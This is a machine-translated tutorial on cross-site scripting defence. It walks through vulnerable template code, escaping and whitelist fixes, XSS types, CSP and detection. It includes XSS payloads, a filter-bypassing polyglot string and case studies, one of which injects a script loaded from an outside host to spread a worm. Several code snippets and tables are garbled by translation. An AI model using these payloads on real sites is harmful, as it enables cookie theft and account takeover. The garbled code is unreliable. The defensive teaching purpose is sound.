case
One day, the company needs a search page and determines the content of the keywords based on the URL parameters. Xiao Ming quickly wrote the page and put it online. The code is as follows:
<input type="text" value="<%= getParameter("keyword") % >"<%= getParameter() </button> <div>"keyword") %>
</div>
Copy the code
When the browser requests http://xxx/search? When keyword=”>, the server will parse the request parameter keyword and get “>, which will be spliced into HTML and returned to the browser. The following HTML is formed:
<input type="text" value=""><script>alert('XSS'); </script>
><script>alert('XSS'); </script> </div>Copy the code
The browser can’t tell it’s malicious code and executes it.
Not only is the content of the div injected, but the value property of the input is injected, and alert pops up twice.
In the face of this situation, how should we take precautions?
In fact, this is just the browser taking the user’s input as a script and executing it. Just tell the browser that the content is text.
Smart Xiao Ming quickly found a solution to fix the bug:
<input type="text" value="<%= escapeHTML(getParameter("keyword")) %>"<%= escapeHTML(getParameter())"keyword")) %>
</div>
Copy the code
EscapeHTML () escapes according to the following rules:
| | characters escaped character | | – | – | | and | and | | < | < | | > | > | | | “” | | ‘| | | | / |
After processing the escape function, the browser finally receives the following response:
<input type="text" value="" > < script> alert(' XSS') ; < / script>"> <button> search </button> <div> The keyword you search for is "button". > < script> alert(' XSS') ; < / script>
</div>
Copy the code
The malicious code is escaped, no longer executed by the browser, and the search term appears perfectly on the page.
Through this event, Xiao Ming learned the following knowledge:
Typically, a page contains user input in a fixed container or property, which is presented as text. Attackers use fragments of user input from these pages to concatenate specially formatted strings to break through the limitations of original locations and form code fragments. Attackers inject scripts on target websites and make them run on users’ browsers, posing potential risks. XSS attacks can be prevented by HTML escaping. Of course it’s not that simple! Keep reading. Note the special HTML attributes, JavaScript apis since the last event, Ming has been careful to escape data inserted into the page. He also discovered that most templates come with escape configurations, so that all data inserted into the page is escaped by default. In this way, he was not afraid of accidentally missing unescaped variables, so Xiao Ming’s work gradually became easier.
However, as a director, I couldn’t let Xiao Ming fix bugs so easily and happily.
Before long, Xiao Ming received a mysterious link from the security group: http://xxx/? Redirect_to = javascript: alert (‘ XSS). Xiao Ming dare not careless, quickly open the page. However, the page does not automatically pop up the evil “XSS”.
Xiaoming opened the source code of the corresponding page and found the following content:
<a href="<%= escapeHTML(getParameter("redirect_to")) %>"> jump... </a>Copy the code
This code, when the attack URL is http://xxx/? Redirect_to =javascript:alert(‘XSS’)
<a href="javascript:alert(' XSS') "> jump... </a>Copy the code
The code doesn’t execute immediately, but once the user clicks on the A TAB, the browser pops up with “XSS.”
In this case, the user’s data does not violate our constraints in location and is still the correct href attribute. But it wasn’t the kind of content we expected.
It turns out that not only special characters, but also javascript: strings like this can cause XSS attacks if they appear in certain places.
Xiao Ming frowned and thought of a solution:
// Disallow the URL with"javascript:"Start XSS = getParameter("redirect_to").startsWith('javascript:');
if(! xss) { <a href="<%= escapeHTML(getParameter("redirect_to") % >"> jump... </a> }else {
<a href="/ 404"> jump... </a> }Copy the code
As long as the URL doesn’t start with javascript:, is it safe?
The security group dropped another connection: http://xxx/? redirect_to=jAvascRipt:alert(‘XSS’)
Can that be done? … . Well, that’s how powerful browsers are.
Xiaoming was ready to cry. When judging whether the URL started with javascript:, he first changed the user’s input to lowercase and then compared it.
However, as the saying goes, “While the priest climbs a post, the devil climbs ten.” Faced with Ming’s protection policy, the security group constructed a connection like this:
http://xxx/?redirect_to= javascript:alert(‘XSS’)
%20javascript:alert(‘XSS’) becomes javascript:alert(‘XSS’) after URL parsing. This string begins with a space. In this way, the attacker can bypass the keyword rules of the back end and successfully complete the injection.
Finally, Ming chose the whitelist method and solved the loophole completely:
// Filter according to the project situation"javascript:"AllowSchemes = ["http"."https"];
valid = isValid(getParameter("redirect_to"), allowSchemes);
if (valid) {
<a href="<%= escapeHTML(getParameter("redirect_to") % >"> jump... </a> }else {
<a href="/ 404"> jump... </a> }Copy the code
Through this event, Xiao Ming learned the following knowledge:
Just because YOU’ve escaped HTML doesn’t mean you’re safe. For link jumps, such as <a href=” XXX “or location.href=” XXX”, verify their content and prohibit links that start with javascript:, and other illegal schemes.
Different escape rules are adopted depending on the context
One day, In order to speed up the loading of the web page, Xiaoming inlined a data into HTML by means of JSON:
<script>
var initData = <%= data.toJSON() %>
</script>
Copy the code
You cannot use escapeHTML() where you insert JSON because the JSON format will be broken after escaping “.
However, the security group discovered that inlining JSON in this way is not secure:
If the JSON contains U+2028 or U+2029 characters, they cannot be used as JavaScript literals. Otherwise, a syntax error will be thrown. When JSON contains the string , the current script tag will be closed and the following string content will be parsed by the browser as HTML. Injection can be done by adding the next
The escape rules are as follows:
| | characters escaped character | | – | – | | | U + 2028 \ u2028 | | U + 2029 | \ u2029 | | < | \ u003c |
The fixed code looks like this:
<script>
var initData = <%= escapeEmbedJSON(data.toJSON()) %>
Copy the code
Through this event, Xiao Ming learned the following knowledge:
HTML escape is very complex and requires different escape rules in different situations. If you use the wrong escape rules, you are likely to run into XSS trouble. You should avoid writing your own escape libraries and use mature, industry-wide escape libraries instead.
Summary of vulnerability Xiao Ming’s example is finished, let’s take a look at the XSS system has what injection method:
- In text embedded in HTML, malicious content is injected as script tags.
- In inline JavaScript, concatenated data breaks through the original constraints (strings, variables, method names, etc.).
- In tag attributes, malicious content includes quotes to override attribute values and inject other attributes or tags.
- In the href, SRC and other attributes of the tag, it contains javascript: and other executable codes.
- Inject uncontrolled code in events such as onload, onError, and onClick.
- In the style attribute and tag, include something like background-image:url(“javascript:…”) ); (newer versions of browsers are already defensible).
- In the style attribute and tag, contain something like expression(…) CSS expression code (newer versions of browsers are already defensible).
In short, if a developer inserts text into HTML without filtering it properly, it can easily create an injection vulnerability. Attackers can use vulnerabilities to construct malicious code instructions, and then use malicious code to harm data security.
What is a XSS
Cross-site Scripting (XSS) is a code injection attack. The attacker injects malicious scripts on the target website to run on the user’s browser. Using these malicious scripts, attackers can obtain sensitive user information such as cookies and sessionIDS, thus compromising data security.
To distinguish it from CSS, the first letter of the attack has been changed to X, so it is called XSS.
The essence of XSS is that malicious code is unfiltered and mixed in with the site’s normal code; Browsers cannot tell which scripts are trusted, causing malicious scripts to be executed.
Because it is executed directly on the user’s terminal, malicious code can directly obtain the user’s information, or use this information to impersonate the user to launch the request defined by the attacker to the website.
In some cases, injected malicious scripts are shorter due to input constraints. However, more complex attack strategies can be implemented by introducing external scripts and executing them by the browser.
Here’s a question: How do users “inject” malicious scripts?
Not only the “user’s UGC content” on the business can be injected, but also the parameters on the URL can be the source of attack. None of the following can be trusted when processing input:
- UGC information from the user
- Links from third parties
- The URL parameter
- POST parameters
- Referer (possibly from an untrusted source)
- Cookies (possibly injected from other subdomains)
XSS classification
Type stored XSS
Storage XSS attack steps:
- The attacker submits malicious code to the database of the target website.
- When the user opens the target website, the website server takes the malicious code out of the database, splices it into HTML and returns it to the browser.
- When the user’s browser receives the response, it parses it and executes the malicious code mixed in.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
This kind of attack is common in website functions with user-saved data, such as forum posts, product reviews, and user messages.
Reflective XSS
Attack steps of reflective XSS:
- The attacker constructs a special URL that contains malicious code.
- When a user opens a URL with malicious code, the web server takes the malicious code out of the URL, splices it into HTML and returns it to the browser.
- When the user’s browser receives the response, it parses it and executes the malicious code mixed in.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
The difference between reflective XSS and stored XSS is that the stored XSS malicious code is stored in the database, while reflective XSS malicious code is stored in the URL.
Reflective XSS vulnerabilities are common in functions that pass parameters through urls, such as website search, jump, etc.
Because users need to take the initiative to open malicious URL to take effect, attackers often combine a variety of means to induce users to click.
Reflective XSS can also be triggered by the contents of a POST, but the trigger condition is more stringent (the form submission page needs to be constructed and the user is directed to click), so it is very rare.
The DOM model XSS
DOM XSS attack steps:
- The attacker constructs a special URL that contains malicious code.
- The user opens a URL with malicious code.
- When the user’s browser receives the response, it parses it and executes it. The front-end JavaScript picks up the malicious code in the URL and executes it.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
DOM XSS differs from the previous two types of XSS: DOM XSS attacks, in which malicious code is extracted and executed by the browser side, are security vulnerabilities of the front-end JavaScript itself, while the other two types of XSS are security vulnerabilities of the server side.
XSS attack prevention
As you can see from the previous introduction, XSS attacks have two main elements:
The attacker submits malicious code. The browser executes malicious code. For the first factor: can we filter out the malicious code that users enter during the process?
The input filter
As the user submits, the input is filtered by the front end and then submitted to the back end. Is this feasible?
The answer is no. Once the attacker bypasses the front-end filtering and constructs the request directly, the malicious code can be submitted.
Change the filtering timing: the back end filters the input before writing it to the database, then returns the “safe” content to the front end. Is this feasible?
For example, a normal user enters 5 < 7, which is escaped to 5 < 7 before writing to the database.
The problem is: during the commit phase, we’re not sure where the content is going to be exported.
“Not sure where to output” has two meanings:
The user’s input may be provided to both the front end and the client, and once escapeHTML() is passed, the client displays gibberish (5 < 7). In the front end, different locations require different coding.
When 5 < 7 is used as an HTML splicing page, it can be displayed normally:
Of course, input filtering is necessary for explicit input types such as numbers, urls, phone numbers, email addresses, and so on.
Since input filtering is not entirely reliable, we protect against XSS by preventing browsers from executing malicious code. This section falls into two categories:
1. Prevent injection in HTML. 2. Prevent malicious code from being executed during JavaScript execution.Copy the code
Protects against stored and reflective XSS attacks
Both stored and reflective XSS are inserted into the response HTML after the server takes out the malicious code, where the attacker’s deliberate “data” is embedded in the “code” and executed by the browser.
There are two common approaches to prevent these vulnerabilities:
- Change to pure front-end rendering, separating code from data.
- Fully escape HTML.
Pure front-end rendering
Pure front-end rendering process:
The browser first loads a static HTML that does not contain any business-related data. The browser then executes the JavaScript in the HTML. JavaScript loads the business data through Ajax and calls the DOM API to update it to the page. In a pure front-end rendering, we explicitly tell the browser whether to set a text (.innertext), an attribute (.setAttribute), a style (.style), etc. Browsers can’t easily be tricked into executing unexpected code.
However, pure front-end rendering also needs to avoid DOM-type XSS vulnerabilities (such as onload events and javascript: XXX in href, see section “Preventing DOM-type XSS attacks” below).
In many internal and management systems, pure front-end rendering is perfectly appropriate. However, for pages with high performance requirements or SEO requirements, we still face the problem of concatenated HTML.
Escaped HTML
If concatenating HTML is necessary, you need to use a suitable escape library to adequately escape the insertion points of the HTML template.
Common template engines such as dot.js, EJs, FreeMarker, etc., usually have only one rule for HTML escaping, which is to escape & < > “‘ /. This does provide some XSS protection, but it’s not perfect:
| XSS vulnerabilities | escape if there is a simple protection | | – | – | | HTML tags text content | | | | have HTML attribute value | | CSS inline style no | | | inline JavaScript no | | | inline JSON no | | | | | free jump link
So to improve XSS safeguards, we need to use more sophisticated escape strategies.
Prevents DOM XSS attacks
DOM TYPE XSS attack is actually the site’s front-end JavaScript code itself is not strict enough, the untrusted data as code execution.
Be careful when using.innerhtml,.outerhtml, and document.write(). Do not insert untrusted data into the page as HTML. Instead, use.textContent,.setAttribute(), etc.
If using the Vue/React technology stack, and do not use the v – HTML/dangerouslySetInnerHTML function, on the front end render phase avoid innerHTML, outerHTML XSS concerns.
Inline event listeners in the DOM, such as location, onClick, onError, onload, onmouseover, etc. JavaScript eval(), setTimeout(), setInterval(), etc., can all run strings as code. If untrusted data is concatenated into strings and passed to these apis, it is easy to create a security risk that must be avoided.
<! Inline event listener contains malicious code -->! [](https://awps-assets.meituan.net/mit-x/blog-images-bundle-2018b/3e724ce0.data:image/png,) <! --> <a href="UNTRUSTED">1</a>
<script>
// setTimeout()/setCall malicious code in Interval()setTimeout("UNTRUSTED")
setInterval("UNTRUSTED"// location calls the malicious code location.href ='UNTRUSTED'
// eval() to call malicious codeeval("UNTRUSTED")
</script>
Copy the code
Other XSS precautions
While careful escaping can prevent XSS from occurring when rendering pages and executing JavaScript, it is not enough to rely solely on development caution. Here are some common solutions to reduce the risks and consequences of XSS.
Content Security Policy
Strict CSP can play the following roles in XSS prevention:
- Prohibit loading outfield code to prevent complex attack logic.
- Prohibit submission from the outdomain. After a website is attacked, user data will not be leaked to the outdomain.
- Forbid inline script execution (strict rules, currently found to be used on GitHub).
- Disable unauthorized script execution (new feature, in use with Google Map Mobile).
- Proper use of reports can discover XSS in a timely manner, which helps to rectify problems as soon as possible.
Input length control
Untrusted input should be limited to a reasonable length. While you can’t completely prevent XSS from happening, you can make XSS attacks more difficult.
Other Safety measures
- Http-only Cookie: Disables JavaScript from reading certain sensitive cookies. Attackers cannot steal these cookies after XSS injection.
- Verification code: Prevents scripts from posing as users to submit dangerous operations.
The detection of XSS
Ming gained a lot from the above experience. He also learned how to prevent and repair XSS vulnerabilities and acquired relevant security awareness in daily development. But how do you detect XSS vulnerabilities in code that is already live?
After some searching, Xiao Ming found two methods:
1. Manually detect XSS vulnerabilities using the generic XSS attack string. 2. Use a scanning tool to automatically detect XSS vulnerabilities.Copy the code
Unleashing an Ultimate XSS Polyglot article, Xiao Ming found such a string:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/
Copy the code
It can detect XSS vulnerabilities in various contexts such as HTML attributes, HTML text content, HTML comments, jump links, inline JavaScript strings, inline CSS stylesheets, etc. It can also detect eval(), setTimeout(), setInterval(), Function(), innerHTML, document.write() and other DOM XSS vulnerabilities, and can bypass some XSS filters.
Xiao Ming simply submits the string in each input field of the website, or concatenates it to the URL parameter, and can do the detection.
In addition to manual detection, XSS vulnerabilities can be found using automated scanning tools such as Arachni, Mozilla HTTP Observatory, W3AF, and others.
Summary of XSS attacks
- XSS defense is the responsibility of the back-end RD. The BACK-END RD should escape sensitive characters on all interfaces where users submit data before performing further operations.
Is not correct. This is because: * It is the responsibility of the back-end RD to guard against stored and reflective XSS. DOM XSS attacks do not occur in the back end, which is the responsibility of the front RD. XSS prevention is a system engineering involving both the back-end RD and the front-end RD. * Escape should occur when the HTML is output, not when user input is submitted.
- All data to be inserted into the page is escaped by a sensitive character filtering function. After filtering out common sensitive characters, the data can be inserted into the page.
Is not correct. Different contexts, such as HTML attributes, HTML text content, HTML comments, jump links, inline JavaScript strings, inline CSS stylesheets, and so on, require different escape rules. Business RD needs to select the appropriate escape library and invoke different escape rules for different contexts.
Overall XSS defense is very complex and tedious, and we not only need to escape the data in all the places that need to be escaped. And to prevent redundant and error escape, to avoid normal user input garbled.
Although it is difficult to completely avoid XSS by technical means, we can summarize the following principles to reduce vulnerability:
- Use the template engine to enable the HTML escape function of the template engine. For example, in EJS, try to use <%= data %> instead of <% -data %>; In dot.js, use {{! Data} instead of {{= data}; In a FreeMarker, ensure that the engine version above 2.3.24, and choose the correct FreeMarker. Core. OutputFormat.
- OnLoad =” onLoad (‘{{data}}’)”, onClick=”go(‘{{action}}’)” It is safer to bind in JavaScript via the.addeventListener () event.
- Avoid concatenating HTML. It is dangerous to concatenate HTML at the front end. If the framework allows this, use createElement, setAttribute, etc. Or use a mature rendering framework such as Vue/React.
- Keep your guard up when inserting DOM properties, links, etc.
- Increasing the attack difficulty and reducing the attack consequence You can increase the attack difficulty and reduce the attack consequence by using CSP, input length configuration, and interface security measures.
- Proactive detection and discovery can be used to find potential XSS vulnerabilities using XSS attack strings and automated scanning tools.
XSS attack case
1. QQ mailbox m.exmail.qq.com Domain name reflection XSS vulnerability
The attacker found m.exmail.qq.com/cgi-bin/log… The URL parameters uin and domain are output directly to HTML without being escaped.
The attacker constructs a URL and directs the user to click: m.exmail.qq.com/cgi-bin/log…
When the user clicks on this URL, the server retrieves the URL parameters and concatenates them into the HTML response:
<script>
getTop().location.href="/cgi-bin/loginpage? autologin=n&errtype=1&verify=&clientuin=aaa"+"&t="+"&d=bbbb";return false; </script><script>alert(document.cookie)</script>"+".Copy the code
After the browser receives the response, it will execute alert(document.cookie), and the attacker can steal the cookie of the current user under the QQ mailbox domain name through JavaScript, thus endangering the data security.
2. Reflection XSS vulnerability of Sina Weibo Hall of Fame
The attacker found weibo.com/pub/star/g/… The content of this URL is output directly to HTML, unfiltered.
The attacker then constructs a URL and induces the user to click:
Weibo.com/pub/star/g/…” >
When the user clicks on this URL, the server retrieves the request URL and concatenates it into the HTML response:
<li><a href="http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>"> Copy the code
After the browser receives the response, it will load and execute the malicious script //xxxx.cn/image/t.js. In the malicious script, the user’s login status is used for following, tweeting, and sending private messages. The weibo and private messages sent can be brought with the attack URL to induce more people to click and enlarge the attack scope. This is called the XSS worm, which uses the identity of the victim to publish malicious content and expand the scope of the attack.
Expanded reading: Automatic Context-Aware Escaping
As we mentioned above:
- Proper HTML escapes can help avoid XSS vulnerabilities.
- A well-developed escape library requires a variety of rules for context, such as HTML attributes, HTML literal content, HTML comments, jump links, inline JavaScript strings, inline CSS stylesheets, and so on.
- Business RD needs to select different escape rules based on the context of each insertion point. Generally, the escape library is Not context-aware of the insertion point, so the responsibility of implementing the escape rules falls on the business RD. Each business RD needs to fully understand the various situations of XSS, and it needs to ensure that each insertion point uses the correct escape rules.
This mechanism requires a lot of work and relies on manual guarantee, which makes it easy to create XSS vulnerabilities and difficult for security personnel to find hidden dangers.
In 2009, Google introduced a concept called Automatic Context-Aware Escaping.
Context-aware means that as the template engine parses the template string, it parses the template syntax, analyzes the Context of each insertion point, and automatically selects different escape rules accordingly. This reduces the workload of the business RD, and also reduces artificial omissions.
In a template engine that supports Automatic Context-Aware Escaping, business RD can define templates like this without manually implementing escape rules:
<html>
<head>
<meta charset="UTF-8">
<title>{{.title}}</title>
</head>
<body>
<a href="{{.url}}">{{.content}}</a>
</body>
</html>
Copy the code
After parsing, the template engine knows the context of the three insertion points and automatically selects the corresponding escape rules:
<html>
<head>
<meta charset="UTF-8">
<title>{{.title | htmlescaper}}</title>
</head>
<body>
<a href="{{.url | urlescaper | attrescaper}}">{{.content | htmlescaper}}</a>
</body>
</html>
Copy the code
Automatic Context-Aware Escaping template engines that are currently supported are:
- go html/template
- Google Closure Templates
reference
Meituan Technical Team - Front-end safety series